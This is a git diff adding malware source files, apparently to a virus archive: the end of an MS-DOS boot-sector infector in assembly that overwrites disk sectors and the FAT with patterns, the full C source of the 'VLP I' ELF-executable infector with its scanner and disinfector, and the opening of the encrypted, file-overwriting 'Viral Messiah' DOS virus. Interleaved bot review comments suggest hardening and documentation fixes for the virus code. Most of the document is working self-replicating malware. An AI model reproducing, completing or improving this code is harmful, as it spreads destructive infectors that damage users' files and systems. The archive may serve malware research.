+ push es + mov ax,102h +el2: push ax + retf +el1: mov bx,0f00h + mov al,1 + mov cl,8 + int 13h + pop bx + jc veg2 + push es + mov ax,105h + jmp el2 +veg2: nop + nop +wincsi: jmp aba +aasw: mov al,cs:byte ptr [flag2] + cmp al,80h + jz cxz + jmp kilep +cxz: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop ax + pop bx + cmp ch,0 + jz acb + jmp abbb +acb: cmp cl,0ah + jc acd + jmp abbb +acd: cmp dh,0 + jz ace + jmp abbb +ace: cmp ah,3 + jnz abe + mov cs:byte ptr [flag2],0 +abb: push ax + push bx + push cx + push dx + mov dx,80h + mov ax,201h + mov cx,9 + mov bx,offset boot+200h + push es + push cs + pop es + mov dx,80h + call sub13 + jc aca + mov ax,301h + mov cx,1 + mov dx,80h + mov bx,offset boot+200h + call sub13 +aca: pop es + pop dx + pop cx + pop bx + pop ax +abbb: call sub13 + jmp viter1 +abe: cmp ah,2 + jnz abbb + push di + push cx + push dx + push bx + push ax + push ax + mov ah,0 + mov di,ax + pop ax +abj: push cx + cmp cl,1 + jnz abh + mov cl,9 + jmp abi +abh: mov cx,0ah +abi: push bx + push di + mov al,1 + push es + mov ah,2 + call sub13 + pop es + pop di + pop bx + pop cx + jc abk + 
add bx,200h + mov cl,2 + dec di + jnz abj + pop ax + mov ah,0 + pop bx + pop dx + pop cx + pop di + clc + jmp viter1 +abk: pop bx + pop bx + pop dx + pop cx + pop di + mov al,0 + jmp viter1 +aba: mov al,cs:byte ptr [flag2] + cmp al,80h + jnz abc + jmp aasw +abc: cmp al,40h + jnz abw + jmp aasw +abw: mov cx,3 +ckld: push cx + mov dx,80h + mov cx,1 + mov bx,offset boot + mov ax,201h + push cs + pop es + call sub13 + pop cx + jnc abdq + loop ckld +kias: jmp aasw +abdq: mov dx,180h + mov cx,1 + mov bx,offset boot+200h + mov ax,201h + push cs + pop es + call sub13 + jc kias + mov bx,offset boot+200h + mov ax,cs:[bx+1feh] + cmp ax,0aa55h + jz abd + mov cs:byte ptr [flag2],40h + jmp kias +abd: push cs + pop ds + mov cx,3 + mov bx,offset boot + mov si,offset kezd3 +kere: mov al,[bx] + cmp al,[si] + jnz nem9 + inc bx + inc si + loop kere + sub bx,3 + add bx,offset ver2-kezd3 + mov al,[bx] + cmp al,23 + jnz nemq + mov ax,[si+offset ver2-offset kezd3] + cmp ax,[bx+1] + jc nemr +nemq: mov ax,307h + jmp nemw +nemr: mov cs:byte ptr [flag2],80h + jmp aasw +nem9: mov ax,308h +nemw: mov dx,80h + mov cx,2 + mov bx,100h + call sub13 + jnc oby + jmp aasw +oby: mov si,offset kezd3 + mov cx,offset veg3-offset kezd3 + mov di,offset boot + pushf + cld + rep movsb + popf + mov ax,301h + mov dx,80h + mov cx,01h + mov bx,offset boot + call sub13 + mov cs:byte ptr [flag2],80h + jmp aasw +kezd3: int 12h + mov bx,40h + mul bx + sub ax,1000h + mov es,ax + xor ax,ax + jmp ugas +ver2: db 23,0,6 +ugas: mov ss,ax + mov sp,7c00h + mov dx,80h + mov cx,02h + mov ax,208h + mov bx,100h + push bx + cmp es:word ptr [bx],2452h + jz el11 + int 13h + pop bx + jc vege + push es + mov ax,102h +el21: push ax + retf +el11: mov bx,0f00h + mov al,1 + mov cl,9 + int 13h + pop bx + jc vege + push es + mov ax,105h + jmp el21 +vege: jmp vege ;szoveg kiiratasa +veg3: nop + nop +cime: dw 0 +bot1: sti + int 13h + db 72h,67h + mov al,ds:[7c10h] + cbw + mul ds:word ptr [7c16h] + add ax,ds:[7c1ch] + add ax,ds:[7c0eh] + mov 
ds:[7c3fh],ax + mov ds:[7c37h],ax + mov ax,20h + mul ds:word ptr [7c11h] + mov bx,ds:[7c0bh] + add ax,bx + dec ax + div bx + add ds:[7c37h],ax + mov bx,0500h + mov ax,ds:[7c3fh] + db 0e8h,09fh,0 + mov ax,201h + db 0e8h,0b3h,0,72h,19h + mov di,bx + mov cx,0bh + mov si,7dd6h + repz cmpsb + db 75h,0dh + lea di,ds:[bx+20h] + mov si,7d1eh + mov cx,0bh + repz movsb + db 74h,18h + db 0,0,0,0,0,0,0,0,0,0,0,0 +tb12: db 0dfh,2,25h,2,0fh,1bh,0ffh,54h,0f6h,0fh,8,4fh,0,4 +tb720: db 0d1h,2,25h,2,9,2ah,0ffh,50h,0f6h,0fh,4,4fh,80h,5 +tb360: db 0dfh,2,25h,2,9,23h,0ffh,50h,0f6h,0fh,8,27h,40,3 +tb14: db 0a1h,2,25h,2,12h,1bh,0ffh,60h,0f6h,0fh,4,4fh,0,7 +int1e: dw 0,0,0,0,0,0,0,0 +hdtbl: db 50h,0,1,2,50h,0,2,2,50h,0,3,2,50h,0,4,2,50h,0,5,2,50h,0,6,2,50h,0,7,2,50h,0,8,2,50h,0,9,2,50h,0,0ah,2,50h,0,0bh,2,50h,0,0ch,2,50h,0,0dh,2,50h,0,0eh,2 + db 50h,0,0fh,2,50h,0,10h,2,50h,0,11h,2,50h,0,11h,2,50h,0,12h,2 +dstbl: db 28h,0,1,2,28h,0,2,2,28h,0,3,2,28h,0,4,2,28h,0,5,2,28h,0,6,2,28h,0,7,2,28h,0,8,2,28h,0,9,2 +mod2: db 0 +mod1: db 0 +beszur: push ax + push bx + push cx + push dx + push es + push ds + push di + push si + mov ax,201h + mov cx,0ah + mov bx,offset boot + mov dx,80h + push cs + pop es + pushf + push cs + call int13 + mov es,cs:word ptr [szegm] + mov es:word ptr [mod2],0 + jc hib + mov ax,cs:word ptr [boot] + cmp al,23h + jnz hib + mov es:byte ptr [mod2],ah + jmp hib +hib: mov es,cs:word ptr[szegm] + mov bx,offset kiiras + mov cx,offset kiirv-offset kiiras + mov al,es:[bx] + cmp al,20h + jnz hib1 +cijk: mov al,es:[bx] + xor al,45h + mov es:[bx],al + inc bx + loop cijk +hib1: mov ch,25h + mov ah,4 + int 1ah + jc friss + cmp cl,89h + jc friss + cmp ch,25h + jz bete + cmp dh,7 + jnc bete + jmp nbete +friss: mov al,54h + out 43h,al + mov al,0ffh + out 41h,al + jmp nbete +bete: cmp es:byte ptr [mod2],2 + jz nbete + mov ax,0 + mov ds,cs:word ptr [szegm] + mov es,ax + mov ax,es:word ptr[70h] + mov ds:word ptr [tim+1],ax + mov ax,es:word ptr[72h] + mov ds:word ptr [tim+3],ax + mov ax,offset 
timer + mov es:word ptr [70h],ax + mov ax,cs:word ptr [szegm] + mov es:word ptr [72h],ds +nbete: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop bx + pop ax + ret +szegm: dw 0,0 +tim: db 0eah,0,0,0,0,0 +szama: dw 28800 +timer: pushf + push ax + push bx + push cx + push dx + push ds + push cs + pop ds + mov cx,2 + mov bx,offset atir + mov al,cs:[bx] + cmp al,90h + jnz rwt + jmp reset +rwt: call ftr + jc rwe + loop rwt + jmp reset +rwe: pop ds + mov ax,cs:word ptr [szama] + dec ax +kii: mov cs:word ptr [szama],ax + jz gyilk1 + pop dx + pop cx + pop bx + pop ax + popf + jmp tim +gyilk1: mov ax,28800 + mov cs:byte ptr [mod1],1 + inc ax + jmp kii +leol: mov bx,offset kiiras + mov cx,offset kiirv-offset kiiras + mov al,cs:[bx] + cmp al,20h + jz leol1 +adla: mov al,cs:[bx] + xor al,45h + mov cs:[bx],al + inc bx + loop adla +leol1: push cs + pop ds + cmp cs:byte ptr [mod2],1 + jz atu +irtas: mov si,offset graf + mov di,offset boot + mov cx,128 + mov dl,4*9 + push cs + pop es + push cs + pop ds + cld +cvgh: rep movsb + sub si,128 + mov cx,128 + dec dl + jnz cvgh + mov dx,180h + mov ax,309h + mov cx,2 + mov bx,offset boot + pushf + push cs + call int13 + mov dx,280h + mov ax,309h + mov cx,2 + mov bx,offset boot + pushf + push cs + call int13 + mov dx,0 + mov ax,309h + mov cx,1 + mov bx,offset boot + pushf + push cs + call int13 +atu: mov si,offset kiiras + mov al,2 + mov ah,0 + int 10h +awqt: mov al,cs:[si] + cmp al,0 + jz kie + mov ah,0eh + mov bx,0 + push si + int 10h + pop si + inc si + jmp awqt +kie: cli + hlt + jmp kie +kiiras: db ' Haha,vrus van a gpben!!',0dh,0ah,'Ez egy eddig mg nem kzismert vrus. De hamarosan az lesz.' + db 0dh,0ah,'A neve egyszeren tltget ',0dh,0ah,'Ezt a nevt onnan kapta, hogy' + db ' feltltgeti a FAT-tblt klnbz alakzatokkal.',0dh,0ah + db 'Ez mr meg is trtnt !!! 
',0dh,0ah,0,0
+graf: db 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32
+ db 32,01,01,01,01,01,01,32,32,01,01,01,01,01,01,32
+ db 01,32,32,32,32,32,32,01,01,32,32,32,32,32,32,01
+ db 01,32,01,32,32,01,32,01,01,32,01,32,32,01,32,01
+ db 01,32,32,32,32,32,32,01,01,32,32,32,32,32,32,01
+ db 01,32,01,01,01,01,32,01,01,32,01,01,01,01,32,01
+ db 32,01,32,32,32,32,01,32,32,01,32,32,32,32,01,32
+ db 32,32,01,01,01,01,32,32,32,32,01,01,01,01,32,32
+kiirv: db 0
+start ends
+ end
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.vlp1.c b/MSDOS/Virus.MSDOS.Unknown.vlp1.c
new file mode 100644
index 00000000..fb7af23f
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.vlp1.c
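Review bot: The listing has no header comment stating what it is, which assembler dialect it targets or that it is archived for analysis, whereas the v-oneate file in the same commit opens with exactly such a header; the `start segment` / `assume cs:start,ds:start` / `org 100h` preamble at the top of the file is where a reader looks for it. I would add a short block above `start segment` along the lines of `; Archived listing of what appears to be a boot-sector/MBR infector (MASM-style syntax, org 100h). Comments and the text at kiiras: are Hungarian; the accented characters in that text were lost in transcription, so this copy is probably not byte-faithful to the original.` The one inline comment, `vege: jmp vege ;szoveg kiiratasa`, should also be in English, e.g. `; spin here forever ("print the text" in the original Hungarian)`.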
@@ -0,0 +1,710 @@ + +/* --- Cut - Begin MAIN.C --- */ + +/* This is VLP I . Another method to infect ELF-execs. + * Copyright (C) 1997 by Stealthf0rk of S V A T + * This Virii contains *no* malicious code, but due to + * bugs it is possible that you may get some damage on your system. + * You use this progrma(s) on your own risk ! ! ! + * I'm not responsible for any damage you may get due to playing around + * with this. Only run VLP with permission of the owner of the system you + * wish to test VLP on. + * + * virii: $ cc -O2 -DDEBUG main.c get.c file_ops.c -o virii + * $ strip virii + * nacs: $ cc -O2 nacs.c get.c file_ops.c + * + * greets to NetW0rker and naleZ + * + * how it works + * in bash pseudo_code: + * + * find hostfile + * cp hostfile tmp + * grep THE_VIRCODE argv[0] > hostfile + * cat tmp >> hostfile + * grep THE_OLD_APPENDED_CODE_ON_ARGV[0] argv[0] > tmp + * tmp + * + * + * if you wanna contact the SVAT-group, write to + * stealthf0rk, stealth@cyberspace.org + */ + +#include "vx.h" +#include +#include +#include + +/* The filedescriptor for the LOG-file */ + +#ifdef DEBUG +FILE *fd; +#endif + +int main(int argc, char **argv, char **envp) +{ + char *s, *s2, *path, *dir; + int i; + char from[200]; + +#ifdef DEBUG + /* If U are angry do this: + * setenv("PATH", "/root/VTEST/bin:/root/VTEST/bad:/root/VTEST/usr/bin:/root/VTEST/bad2", 1); + */ + fd = fopen(TRACEFILE, "a"); +#endif + DFPRINTF("====== tracefile of stealthf0rk's VLP ==========\n"); + path = getenv("PATH"); + s = whereis(path, argv[0]); /* return only static! -> */ + if (strcpy(from, s) == NULL) /* so we need a copy */ + return -1; + DFPRINTF("@f main: file of action is <%s>\n", from); + i = infect(3, from); + exechost(from, argv, envp); + return 0; +} + +/* --- Cut - End MAIN.C --- */ + + +/* --- Cut - Begin FILE_OPS.C --- */ + +/* Thiz file contains the routines for writing the code etc. 
*/ + +#include /* .h files maybe different in different OS */ +#include +#include +#include +#include +#include +#include + +#include "vx.h" + +#define TEMP "/tmp/temp" /* with this generate the name of the EXE */ +#define TMP "/tmp/tmp" /* */ + +/*------------------------------*/ + +#ifdef DEBUG +extern FILE *fd; /* debugging */ +#endif + +struct utimbuf { + time_t actime; + time_t modtime; +}; + +/* ATA, ATH, ATD ... not found in my .h's */ + +extern int utime(char *, struct utimbuf*); + +/* infect files , Auftraggeber is */ + +int infect(int anz, char *caller) +{ + int i = 0, j = 0; + char *dir, *f, *path; + + char file[200]; + struct stat status; /* save time ... */ + + path = getenv("PATH"); + if ((dir = getdir(path)) == NULL) /* find directory */ + return -1; + + while (i < anz && j < 10) { /* times */ + DFPRINTF("------------- new infection stack ----------\n"); + DFPRINTF("@f infect: directory of infection is <%s>\n", dir); + j++; + if ((f = gethost(dir, FILEPATH)) == NULL) + continue; + strcpy(file, f); + if (saveattribs(file, &status) < 0) + continue; + if (infect_host(file, caller) < 0) + continue; + if (restoreattribs(file, status) < 0) + continue; + i++; + j = 0; + DFPRINTF("@f infect: infected file is <%s>\n", file); + } + return i; +} + + +/* infect directly */ + +int infect_host(char *host, char *caller) +{ + int in,out, + r,w; + const int vlength = VLENGTH; + char *buff; + + if ((buff = (char*)malloc(vlength)) == NULL) + return -1; + +/* copy to tempfile, open and truncate [the host] + * and copy the beginning (virus, vlength byte) of the running + * program [file 'caller'] to it. 
+ */ + if (cp(host, TMP) == -1) + return -1; + + DFPRINTF("@f infect_host: copied <%s> to <%s> \n", host, TMP); + if ((in = open(caller, O_RDONLY)) == -1) + return -1; + if ((out = open(host, O_RDWR|O_TRUNC)) == -1) + return -1; + DFPRINTF("@f infect_host: opened host <%s> and caller <%s>\n", host, caller); + if ((r = read(in, buff, vlength)) == -1) + return -1; + if ((w = write(out, buff, vlength)) == -1) + return -1; + close(in); + if ((in = open(TMP, O_RDWR)) == -1) + return -1; + +/* append the rest of the original file to the host -> end of infection */ + + while ((r = read(in, buff, vlength)) > 0) { + if ((w = write(out, buff, r)) == -1) + return -1; + } + close(in); + close(out); + free(buff); + DFPRINTF("@f infect_host: try to remove <%s>\n", TMP); + remove(TMP); + return 0; +} + + + +/* -------------------- isinfected --------------------- + * look if a 'detectstring' appears at the end of 'ffile' + * return 1 if so, 0 if not + */ + +int isinfected (char *ffile) +{ + int out,r = 0; + char cmp[4] = {0}; + + DFPRINTF("@f isinfected: look at <%s>\n", ffile); + if ((out = open(ffile, O_RDONLY)) == -1) + return -1; + if ((r = lseek(out, VLENGTH + 1, SEEK_SET)) == -1) + return -1; + if ((r = read (out, cmp, 3)) == -1) + return -1; + if (strcmp("ELF", cmp) == 0) { + close(out); + return 1; + } else + { + close(out); + return 0; + } +} + +/* ------------ iself ------------ + * look if 'host' is ELF + * return 1 if so, 0 if not + * [buggy: an objectfile is also elf as a full executable {:-(8 ] + */ + +int iself(char *host) +{ + int in, + r = 0; + char mn[5] = {0x7f,0x45,0x4c,0x46,'\0'}, /* .ELF */ + buff[5] = {'\0'}; + DFPRINTF("@f iself: look at file <%s>\n", host); + if ((in = open(host, O_RDONLY)) == -1) + return -1; + if ((r = read(in, buff,4)) == -1) + return -1; + if (strcmp(buff, mn) == 0) { + close (in); + return 1; + } + else { + close (in); + return 0; + } +} + +/* isclean() returns 1 if 'file' is clean + * and 0 if not - "clean" means healty, + * 
ELF-executable and normal file (not dir ...) + */ + +int isclean(char *file) +{ + if (isregular(file) == 0) /* prove this first !!! */ + return 0; + if (isinfected(file) == 1) + return 0; + if (iself(file) == 0) + return 0; + return 1; +} + +/* is a normal one ? (links are, directorys not) + * returns 1 if so + */ + + +int isregular(char *file) +{ + struct stat status; + + DFPRINTF("@f isregular: <%s>\n", file); + if (stat(file, &status) == -1) + return 0; + if (!S_ISREG(status.st_mode)) + return 0; + else + return 1; +} + + +/* --------------- exechost ------------------ + * execs the file wich follows the virii and wich must + * be seppareted + */ + +int exechost(char *caller, char **arglist, char **envlist) +{ + + int i, j, in, out, + r, w; + char *buff; + const int vlength = VLENGTH; + char tempfile[20]; + struct stat status; + + + DFPRINTF("@f exechost: caller = <%s> argv[0] = <%s>\n", caller, arglist[0]); + DFPRINTF("=========== end of report =============\n"); +#ifdef DEBUG + if (fd != stdout) + fclose(fd); +#endif + + if ((buff = (char*)(malloc(vlength))) == NULL) + return -1; +/* copy rest out of the program */ + + if ((in = open(caller, O_RDONLY)) == -1) + return -1; + +/* Since the files wich are just executed are locked (can't be opened for + * writing) and more than one of them can run at the same time [that means + * also more that one of a infected file ...] under UNIX we have to search + * for the next tempfile (/tmp/tempXYZ) we can use. 
+ */ + out = -1; + j = 0; + while (out < 0) { + sprintf(tempfile, "%s%d", TEMP, j++); + out = open(tempfile, O_RDWR|O_CREAT|O_TRUNC); + } + + +/* from position 'vlength' ,the virus ends there */ + + if (lseek(in, vlength, SEEK_SET) == -1) + return -1; + while ((r = read(in, buff, vlength)) > 0) { + if ((w = write(out, buff, r)) == -1) + return -1; + } + close(in); + close(out); + free(buff); + + /* put the ORIGINAL attribs of the file to the tempfile */ + saveattribs(caller, &status); + restoreattribs(tempfile, status); + + execve(tempfile, arglist, envlist); + while (1); +} + + +/* ------------------------------- cp ---------------------------- + * copy 'oldfile' to 'newfile' ,don't look for permissons + */ + +int cp(char *oldfile,char *newfile) + { + char *buff; + int nf,of,r,w; + + if ((buff = (char*)malloc(5000)) == NULL) + return -1; + if ((of = open(oldfile, O_RDONLY)) == -1) + return -1; + if ((nf = open(newfile, O_RDWR|O_CREAT|O_TRUNC)) == -1) + return -1; + while ((r = read(of, buff, 5000)) > 0) { + if ((w = write(nf, buff, r)) == -1) + return -1; + } + DFPRINTF("@f cp: successfull copy of %s to %s\n", oldfile, newfile); + free(buff); + close(nf); + close(of); + return 0; + } + +/*---------------------------------------------*/ + +int saveattribs(char *host, struct stat *status) +{ + return stat(host, status); +} + +/*---------------------------------------------*/ + +int restoreattribs(char *host, struct stat status) +{ + struct utimbuf time; + int retval; + + if ((retval = chmod(host, status.st_mode)) < 0) + return retval; + time.actime = status.st_atime; + time.modtime = status.st_mtime; + return utime(host, &time); +} + +/* --- Cut - End FILE_OPS.C --- */ + + + +/* --- Cut - Begin GET.C --- */ + +/* this file contains the functions for find first/next :) + * and all the others ... 
+ */ +#include +#include +#include +#include +#include +#include +#include "vx.h" + +#ifdef DEBUG +extern FILE *fd; +#endif + +/* the same as 'whereis' on the shell + * ATTENTION - return only static - t.m. you can't + * use it for further actions.At the next call of whereis() the + * buffer will be overwritten !!! + * So its need to save the return in a copy before we call whereis() + * again. + */ + +char *whereis(char *path, char *prog) +{ +#define IN_PATH path - _begin < pathlen + 2 + + static char file[200]; + int i = 0, pathlen; + char *_begin; + struct stat status; + + _begin = path; + pathlen = strlen(path); + if (strstr(prog,"/") != NULL) /* if its entered with path */ + return prog; /* -> gotcha */ + memset(file,'\0',200); + + /* Loop until found or the pointer is not longer "in path". + * [the strXYZ() functions fuzzy the best debugger. + * If you want feel free to debug the virus. :-> ] + */ + + while (access(file, X_OK) != 0 && IN_PATH) { + i = strcspn(path,":"); /* split string into dirs */ + strcpy(file, ""); /* only for '\0' ! */ + strncat(file, path, i); + strcat(file, "/"); + strcat(file, prog); + path = path + i + 1; + } + if (!(IN_PATH)) + return NULL; + else { + DFPRINTF("@f whereis: found file <%s>\n", file); + return file; + } +#undef IN_PATH +} + +/* search randomly a directory (one from path) + * and use this for further actions + */ + +char *getdir(char *path) +{ +#define NOT_IN_PATH path - _begin >= pathlen +#define RANDNUM (int)((double)strlen(path)*rand()/(RAND_MAX + 1.0)) + + static char dir[100]; + int n, r, not_found = 1, pathlen; + char *_begin; + static first = 1; + + _begin = path; + pathlen = strlen(path); + + memset(dir,'\0',100); + if (first) + srand(getpid()); + first = 0; + + while (not_found) { + r = RANDNUM; + path += r; + if (r != 0) { + path += strcspn(path, ":"); + path ++; + } + if (NOT_IN_PATH) { + path = _begin; + continue; + } + not_found = 0; + n = strcspn(path, ":"); + strcpy(dir, ""); /* ... 
*/ + strncat(dir, path, n); + strcat(dir,""); /* needed ??? ... */ + } + DFPRINTF("@f getdir: found directory <%s>\n", dir); + return dir; + +#undef NOT_IN_PATH +#undef RANDNUM +} + +/* Search in 'dir' until a "good" file is found + * or all of them are seen as "bad" . + * In this case we come back later :-) . + * If flag == 1 return includes path, if flag == 0 not. + */ + +char *gethost(char *dir, int flag) +{ +#define RANDNUM (int)((double)(found)*rand()/(RAND_MAX + 1.0)) /* uff */ + + static int first = 1, gen = 0; + int r, i = 0; + static struct dirent **filelist; + char *host, *path; + static int found; + + path = getenv("PATH"); + + /* Only 'randomize' at the first call . + * Use scandir() to read out the directory. + */ + if (first) { + if ((found = scandir(dir, &filelist, 0, 0)) <= 0) + return NULL; + srand(getpid()); + } + r = RANDNUM; + + /* Get one of the file randomly. */ + + if ((host = whereis(path, filelist[r]->d_name)) == NULL) + return NULL; + /* isclean means ready for infection: NOT a directory + * NOT a textfile and NOT infected + */ + while (isclean(host) != 1 && i < found) { + r = RANDNUM; + if((host = whereis(path, filelist[r]->d_name)) == NULL) + return NULL; + i++; + } + first = 0; + if (i >= found) + return NULL; + else { + DFPRINTF("@f gethost: got host <%s>\n", host); + if (flag == 0) + return filelist[r]->d_name; /* static */ + if (flag == 1) + return host; /* static, da host ein statischer */ + else /* return von *whereis(...) ist */ + return NULL; + } +#undef RANDNUM +} + +/* --- Cut - End GET.C --- */ + + + +/* --- Cut - Begin VX.H --- */ + +#include + +#define FILEONLY 0 +#define FILEPATH 1 +#define VLENGTH 8000 /* you may have to change this value */ + +/* be sure that /root/VTEST exists if DEBUG is turned on ... */ + +#ifdef DEBUG + #define TRACEFILE "/root/VTEST/VIRtrace" + #define DFPRINTF(format, args...) fprintf(fd, format, ##args) +#else + #define DFPRINTF(format,args...) 
+#endif + + +int infect(int, char*); +int exechost(char*, char**, char**); +int isinfected(char*); +int iself(char*); +int cp(char*, char*); +int restoreattribs(char*, struct stat); +int saveattribs(char*, struct stat*); +int infect_host(char*, char*); +int isclean(char*); +int isregular(char*); + +char *whereis(char*, char*); +char *gethost(char*,int); +char *getdir(char*); + + +/* --- Cut - End VX.H --- */ + + + +/* --- Cut - Begin NACS.C --- */ + +/* Falls er sich mal aus dem Staub macht ... + * + * $ cc -O2 nacs.c get.c file_ops.c -o nacs + * $ strip nacs + * + * NetW0rker/ S V A T + */ + +#include +#include +#include +#include +#include +#include +#include +#include "vx.h" + +#undef DEBUG + +int scan_dir (char*, char*, int); +int disinfect(char*); + +int main (int argc, char *argv[]) +{ + int FLAG = 0; /* == 0 -> nicht saeubern, == 1 saeubern */ + + if (argc < 2) { + printf("\n\n nacs V 0.1 Beta \\/ >< Virusscanner fuer den LDV I\n\n" + "Aufruf: scannt 'directory' mit allen Unterverzeichnissen\n\n"); + exit(0); + } + + if (argc == 4) + FLAG = 1; + scan_dir (argv[1], argv[2], FLAG); + printf ("\n\nnacs: fertig\n\n"); + return 0; +} + +/*------------------------------------------------- */ + +int scan_dir (char *directory, char *logfile, int flag) +{ + FILE *fd; + char *fileapath; + struct dirent **filelist; + struct stat buf; + int count = 0,i = 0; + char *detectstring = "VLP"; + + fd = fopen(logfile, "w+"); /* return egal */ + if ((fileapath = (char*) (malloc (1000))) == NULL) + perror (""), exit (1); + if ((i = scandir (directory, &filelist, 0, 0)) == -1) // dir. scannen + perror (""), exit (2); + for (count = 2; count < i; count++) { /* alle gefundenen Dateien,ausser "." , ".." 
*/ + if ((fileapath = strcpy (fileapath, directory)) == NULL) // Pfad + perror (""), exit (3); + fileapath = strcat (fileapath, "/"); /* Trenner */ + if ((fileapath = strcat (fileapath, filelist[count]->d_name)) == NULL) // + Datei + perror (""), exit (4); + stat (fileapath, &buf); + if ((buf.st_mode & S_IFDIR) == S_IFDIR) /* falls Unterverzeichniss */ + scan_dir (fileapath, logfile, flag); /* rekursiv weiter */ + else { /* sonst scannen */ + printf("\r "); + printf(" \r"); + printf("Datei <%s> ist ", fileapath); + if (isinfected (fileapath)) { + if (fd != NULL) + fprintf(fd, "Datei <%s> ist infiziert.", fileapath); + printf ("infiziert"); + if (flag) { + disinfect(fileapath); + printf(" ... I disinfect ..."); + if (fd != NULL) + fprintf(fd, " ... I disinfect ..."); + } + if (fd != NULL) + fprintf(fd, "\n"); + } + else + printf("sauber"); + fflush(stdout); + } /* else */ + } /* for */ + return count; +} + + +int disinfect(char *file) +{ + int in, out, r; + char *buf; + + buf = (char*)malloc(10000); + if (buf == NULL) + perror(""), exit(1); + cp(file, "./tmp"); + in = open("./tmp", O_RDWR); + out = open(file, O_RDWR|O_TRUNC); + lseek(in, VLENGTH, SEEK_SET); /* ueber virus wegSEEKEN */ + while ((r = read(in, buf, 10000)) > 0) /* cleanen teil kopieren */ + write(out, buf, r); + close(in); + close(out); + remove("./tmp"); + return 0; +} + +/* --- Cut - End NACS.C --- */ + diff --git a/MSDOS/Virus.MSDOS.Unknown.vmessiah.asm b/MSDOS/Virus.MSDOS.Unknown.vmessiah.asm new file mode 100644 index 00000000..a33c83ae --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vmessiah.asm 
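Review bot: The scratch files in file_ops.c are created at fixed, predictable paths with no O_EXCL and no mode argument — `cp()` does `open(newfile, O_RDWR|O_CREAT|O_TRUNC)` on `/tmp/tmp`, and `exechost()` opens `/tmp/temp<N>` the same way — so in a shared /tmp the open follows whatever another user has pre-planted at that name (truncating any file the caller can write), and because open(2) is variadic the omitted mode leaves the new file's permission bits indeterminate. `exechost()` additionally spins in `while (out < 0)` forever when /tmp is not writable, since nothing breaks the loop. Replacing the name loop with `strcpy(tempfile, "/tmp/tempXXXXXX"); out = mkstemp(tempfile); if (out < 0) return -1;` (fits the 20-byte `tempfile`) and opening the copy target in `cp()` with `O_WRONLY|O_CREAT|O_EXCL, 0600` would close both. Separately, every `#include` line in this listing is bare (the header names appear to have been stripped in transcription), so the file as committed does not compile as-is; verify against the original source.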
@@ -0,0 +1,340 @@ +; VMESSIAH.ASM -- Viral Messiah Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Nowhere Man + +virus_type equ 1 ; Overwriting Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near +flag: xchg dh,dh + xchg bp,ax + xchg bp,ax + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov cx,0005h ; Do 5 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + jmp short strt00 ; Success -- skip jump +skip00: jmp end00 ; Skip the routine +strt00: mov si,offset data00 ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + + mov si,offset data00 ; SI points to data + xor dx,dx ; Clear DX +print_loop: lodsb ; Load the next char. into AL + xor ah,ah ; BIOS print char. function + or al,al ; Is the character a null? 
+ je print_done ; If it is, exit + int 017h ; BIOS video interrupt + jmp short print_loop ; Do the next character +print_done: + +end00: mov ax,04C00h ; DOS terminate function + int 021h +main endp + + + db 08Dh,04Eh,054h,059h,0E0h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,135 ; Allocate 135 bytes on stack + + mov byte ptr [bp - 135],'\' ; Start with a backslash + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 134] ; SI points to 64-byte buffer + int 021h + + call traverse_path ; Start the traversal + +traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful? + je done_searching ; If so then we're done + call found_subdir ; Otherwise copy the subdirectory + + mov ax,cs ; AX holds the code segment + mov ds,ax ; Set the data and extra + mov es,ax ; segments to the code segment + + xor al,al ; Zero AL + stosb ; NULL-terminate the directory + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 70] ; DX points to the directory + int 021h + + mov dx,offset com_mask ; DX points to "*.COM" + call find_files ; Try to infect a .COM file + jnc done_searching ; If successful the exit + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect an .EXE file + jnc done_searching ; If successful the exit + jmp short traversal_loop ; Keep checking the PATH + +done_searching: mov ah,03Bh ; DOS change directory function + lea dx,[bp - 135] ; DX points to old directory + int 021h + + cmp word ptr [path_ad],0 ; Did we run out of directories? 
+ jne at_least_tried ; If not then exit + stc ; Set the carry flag for failure +at_least_tried: mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller +com_mask db "*.COM",0 ; Mask for all .COM files +exe_mask db "*.EXE",0 ; Mask for all .EXE files +search_files endp + +traverse_path proc near + mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment + xor di,di ; DI holds the starting offset + +find_path: mov si,offset path_string ; SI points to "PATH=" + lodsb ; Load the "P" into AL + mov cx,08000h ; Check the first 32767 bytes + repne scasb ; Search until the byte is found + mov cx,4 ; Check the next four bytes +check_next_4: lodsb ; Load the next letter of "PATH=" + scasb ; Compare it to the environment + jne find_path ; If there not equal try again + loop check_next_4 ; Otherwise keep checking + + mov word ptr [path_ad],di ; Save the PATH address for later + mov word ptr [path_ad + 2],es ; Save PATH's segment for later + ret 